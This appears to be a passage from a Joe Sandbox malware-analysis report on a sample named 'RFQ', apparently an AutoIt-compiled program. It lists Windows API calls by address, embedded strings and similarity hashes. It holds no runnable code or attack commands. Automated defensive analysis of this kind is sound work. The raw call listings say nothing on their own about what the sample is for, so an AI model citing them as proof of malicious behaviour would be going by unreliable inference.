                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0074A939
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 0074A941
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0074A96C
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0074A974
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0074A999
                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0074A9B6
                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0074A9C6
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0074A9F9
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0074AA0D
• GetClientRect.USER32(00000000,000000FF), ref: 0074AA2B
• GetStockObject.GDI32(00000011), ref: 0074AA47
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0074AA52
  • Part of subcall function 0074B63C: GetCursorPos.USER32(000000FF), ref: 0074B64F
  • Part of subcall function 0074B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
  • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000001), ref: 0074B691
  • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000002), ref: 0074B69F
• SetTimer.USER32(00000000,00000000,00000028,0074AB87), ref: 0074AA79
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 8fa4d5d4906fe8409e26d33c624a5ecbf13e90bcdd22ad6a8f8e6149d33c8a1d
• Instruction ID: ff4ce0691647f84380673adf8f6f7e2dc2c718683837dab0b0bc9463efe179c9
• Opcode Fuzzy Hash: 8fa4d5d4906fe8409e26d33c624a5ecbf13e90bcdd22ad6a8f8e6149d33c8a1d
• Instruction Fuzzy Hash: DFB14C7164020AEFDB24DFA8DC45BAE7BB4FB48314F118229FA15E6290DB78EC40CB55
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00793735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,007CDC00,00000000,?,00000000,?,?), ref: 007937A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007937EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00793874
• RegCloseKey.ADVAPI32(?), ref: 00793B94
• RegCloseKey.ADVAPI32(00000000), ref: 00793BA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: 97dffc4310ba8a4cb1b8b472dc5079c77d34b0b856c0c08496dacf209d360ef5
• Instruction ID: 35fce3439f79a3c97d92f245d8fd94990d71840e9887560d96118fc8dfc5483a
• Opcode Fuzzy Hash: 97dffc4310ba8a4cb1b8b472dc5079c77d34b0b856c0c08496dacf209d360ef5
• Instruction Fuzzy Hash: 2A025AB5604601DFDB14EF14D889E2AB7E5FF88720F05845CF94A9B2A2DB78ED01CB81
APIs
• CharUpperBuffW.USER32(?,?), ref: 00796C56
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00796D16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 65defc3785c5ee39e6cdd76d6c9209a33132cf371a8417d692990c39cbcb17d0
• Instruction ID: d83ce442d721d57533ccc983470187f87e414845db7c5a7f37b0f7471330c7b9
• Opcode Fuzzy Hash: 65defc3785c5ee39e6cdd76d6c9209a33132cf371a8417d692990c39cbcb17d0
• Instruction Fuzzy Hash: 52A18D70604245DBCF14EF20D895A6AB3A6BF44314F104A6DB8A6AB3D2DB3CED06CB51
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0076CF91
• __swprintf.LIBCMT ref: 0076D032
• _wcscmp.LIBCMT ref: 0076D045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0076D09A
• _wcscmp.LIBCMT ref: 0076D0D6
• GetClassNameW.USER32(?,?,00000400), ref: 0076D10D
• GetDlgCtrlID.USER32(?), ref: 0076D15F
• GetWindowRect.USER32(?,?), ref: 0076D195
• GetParent.USER32(?), ref: 0076D1B3
• ScreenToClient.USER32(00000000), ref: 0076D1BA
• GetClassNameW.USER32(?,?,00000100), ref: 0076D234
• _wcscmp.LIBCMT ref: 0076D248
• GetWindowTextW.USER32(?,?,00000400), ref: 0076D26E
• _wcscmp.LIBCMT ref: 0076D282
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: d3caa05266e42afb2dde7c3e3a397b00c58c3d1be7a191d6eed1b09a82bc2976
• Instruction ID: 66d481da28db24b2292ed0b01a7ff68ddaea6464b9868615e4a4d1de32a6670c
• Opcode Fuzzy Hash: d3caa05266e42afb2dde7c3e3a397b00c58c3d1be7a191d6eed1b09a82bc2976
• Instruction Fuzzy Hash: 84A1DF71A14206AFD725DF64C894FEAB7A8FF48354F008619FD9AD2040EB38ED05CB91
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0076D8EB
• _wcscmp.LIBCMT ref: 0076D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0076D924
• CharUpperBuffW.USER32(?,00000000), ref: 0076D941
• _wcscmp.LIBCMT ref: 0076D95F
• _wcsstr.LIBCMT ref: 0076D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 0076D9A8
• _wcscmp.LIBCMT ref: 0076D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0076D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 0076DA28
• _wcscmp.LIBCMT ref: 0076DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 0076DA60
• GetWindowRect.USER32(00000004,?), ref: 0076DAC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: ac567a49f6c74c405ad404ef430d0e5510743322002fd49ba072a713ac5e7d38
• Instruction ID: 5b5d6d299694db7dec5d6fa6c4c9d272a4deb995a84e283965c01daab5a2b966
• Opcode Fuzzy Hash: ac567a49f6c74c405ad404ef430d0e5510743322002fd49ba072a713ac5e7d38
• Instruction Fuzzy Hash: 328108716183459FDB21CF50C885FAA7BE8FF44314F048469FD8A9A096EB38ED45CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 2653f5bd21cbc62cc09fa749faac93ed057def4f697686621307081c10c63495
• Instruction ID: 08b1eb108d963e17e484f96a8ef7651a8b423cc4a3072b665d703fce032c4054
• Opcode Fuzzy Hash: 2653f5bd21cbc62cc09fa749faac93ed057def4f697686621307081c10c63495
• Instruction Fuzzy Hash: 493194B1A44249E6EB24EA51DD5BEEDB3B95F24711F300029F842720E3FF9DAE05C652
APIs
• LoadIconW.USER32(00000063), ref: 0076EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0076EAC2
• SetWindowTextW.USER32(?,?), ref: 0076EAD9
• GetDlgItem.USER32(?,000003EA), ref: 0076EAEE
• SetWindowTextW.USER32(00000000,?), ref: 0076EAF4
• GetDlgItem.USER32(?,000003E9), ref: 0076EB04
• SetWindowTextW.USER32(00000000,?), ref: 0076EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0076EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0076EB45
• GetWindowRect.USER32(?,?), ref: 0076EB4E
• SetWindowTextW.USER32(?,?), ref: 0076EBB9
• GetDesktopWindow.USER32 ref: 0076EBBF
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0076EBC6
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0076EC12
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0076EC1F
                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0076EC44
                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0076EC6F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3869813825-0
                                                                                                                                                    • Opcode ID: 67d32585984803421b213e57e55674ef4123b718821e28b466c3af8098affe7e
                                                                                                                                                    • Instruction ID: cf704769a4d17b14420dc7ebf1c100a6993ddc1794d8c4bc8c95e7a43c1d9fec
                                                                                                                                                    • Opcode Fuzzy Hash: 67d32585984803421b213e57e55674ef4123b718821e28b466c3af8098affe7e
                                                                                                                                                    • Instruction Fuzzy Hash: 0C513D75900709EFDB219FA8CD89F6EBBB5FF04704F004A28E987A25A0D778A944CB14
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007879C6
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 007879D1
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 007879DC
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007879E7
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 007879F2
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 007879FD
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00787A08
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00787A13
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00787A1E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00787A29
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00787A34
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00787A3F
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00787A4A
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00787A55
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00787A60
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00787A6B
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00787A7B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                                    • Opcode ID: bec6624649bca7664b32ec884f4b2e887e9f472137b6015fe3e05f11a544e139
                                                                                                                                                    • Instruction ID: bc6f90ab0539fbc296c20e96b1ef89c3b6bd1463281e4c004cab7eb4fc347052
                                                                                                                                                    • Opcode Fuzzy Hash: bec6624649bca7664b32ec884f4b2e887e9f472137b6015fe3e05f11a544e139
                                                                                                                                                    • Instruction Fuzzy Hash: 743129B0D4831A6ADB109FBA8C8995FBFE8FF04750F504526E50DE7280DA7CA500CFA1
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0073C8B7,?,00002000,?,?,00000000,?,0073419E,?,?,?,007CDC00), ref: 0074E984
                                                                                                                                                      • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0073C93E
                                                                                                                                                      • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0073C953
                                                                                                                                                    • _wcscat.LIBCMT ref: 0073C968
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0073C978
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0073CABE
                                                                                                                                                      • Part of subcall function 0073B337: _wcscpy.LIBCMT ref: 0073B36F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                    • API String ID: 2258743419-1018226102
                                                                                                                                                    • Opcode ID: 8eb4d2c57f2721b8593fa313c030065f85f6194d54c443ffffc638fdfdda84e7
                                                                                                                                                    • Instruction ID: 80bfa6e119aed37798f2c89d415272496b9c47fbf2d1282d6bc4237caae966fb
                                                                                                                                                    • Opcode Fuzzy Hash: 8eb4d2c57f2721b8593fa313c030065f85f6194d54c443ffffc638fdfdda84e7
                                                                                                                                                    • Instruction Fuzzy Hash: 35128D71508341DFD725EF24C885AAFBBE5BF99300F40491EF589A3252DB38EA49CB52
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0079CEFB
                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0079CF73
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0079CFF4
                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0079D016
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079D025
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0079D042
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 0079D075
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079D094
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0079D0A9
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0079D0B0
                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0079D0C2
                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0079D0DA
                                                                                                                                                      • Part of subcall function 0074B526: GetWindowLongW.USER32(?,000000EB), ref: 0074B537
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                    • API String ID: 3877571568-3619404913
                                                                                                                                                    • Opcode ID: a3fc7a07fa2584c39c85d51851bf28654b1c881b37fecc4d702b970977de9408
                                                                                                                                                    • Instruction ID: a79cd40751d43baba1caffad5ef58a3b3ff5d5b851e9915c0de5871614e076d6
                                                                                                                                                    • Opcode Fuzzy Hash: a3fc7a07fa2584c39c85d51851bf28654b1c881b37fecc4d702b970977de9408
                                                                                                                                                    • Instruction Fuzzy Hash: B8719AB4140205AFEB20CF28DC85FA677E5EB88704F54851DF985872A1DB78ED42CB26
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0079F37A
                                                                                                                                                      • Part of subcall function 0079D7DE: ClientToScreen.USER32(?,?), ref: 0079D807
                                                                                                                                                      • Part of subcall function 0079D7DE: GetWindowRect.USER32(?,?), ref: 0079D87D
                                                                                                                                                      • Part of subcall function 0079D7DE: PtInRect.USER32(?,?,0079ED5A), ref: 0079D88D
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0079F3E3
                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0079F3EE
                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0079F411
                                                                                                                                                    • _wcscat.LIBCMT ref: 0079F441
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0079F458
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0079F471
• SendMessageW.USER32(?,000000B1,?,?), ref: 0079F488
• SendMessageW.USER32(?,000000B1,?,?), ref: 0079F4AA
• DragFinish.SHELL32(?), ref: 0079F4B1
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0079F59C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: cb660c0db42046e39331b55bff2a781c06593792f0a072fc611c27a089246727
• Instruction ID: d90da2912a0d7cdb2b4369e082987202ae74605044e378caca0b05ae5a95efe0
• Opcode Fuzzy Hash: cb660c0db42046e39331b55bff2a781c06593792f0a072fc611c27a089246727
• Instruction Fuzzy Hash: 81615C71108340AFC711DF60DC89EABBBF8EF89750F404A2DF595921A1DB789A09CB62
APIs
• VariantInit.OLEAUT32(00000000), ref: 0077AB3D
• VariantCopy.OLEAUT32(?,?), ref: 0077AB46
• VariantClear.OLEAUT32(?), ref: 0077AB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0077AC40
• __swprintf.LIBCMT ref: 0077AC70
• VarR8FromDec.OLEAUT32(?,?), ref: 0077AC9C
• VariantInit.OLEAUT32(?), ref: 0077AD4D
• SysFreeString.OLEAUT32(00000016), ref: 0077ADDF
• VariantClear.OLEAUT32(?), ref: 0077AE35
• VariantClear.OLEAUT32(?), ref: 0077AE44
• VariantInit.OLEAUT32(00000000), ref: 0077AE80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: 0d733e465b7aebe0b16b421313de8140cd3dac4a9c9e541b765a3590a430e6eb
• Instruction ID: be9f9bf47fce1a1772f6872764de44a508bb8dea740d0d4fe2da4778c3d2f965
• Opcode Fuzzy Hash: 0d733e465b7aebe0b16b421313de8140cd3dac4a9c9e541b765a3590a430e6eb
• Instruction Fuzzy Hash: FCD1DEB1A00205FBEF249F65C889B6EB7B5BF84780F14C465E4099B191DB7CEC44DBA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 007971FC
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00797247
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: cdf0c90429c0c4d5ea2de72bb34383e6bac8572ad1c2c1e6c5d0e1040d59dd77
• Instruction ID: 7aa1a4a19844bb0e27e17a9f566de088d4e1f603010a8e41b79636b0a5245169
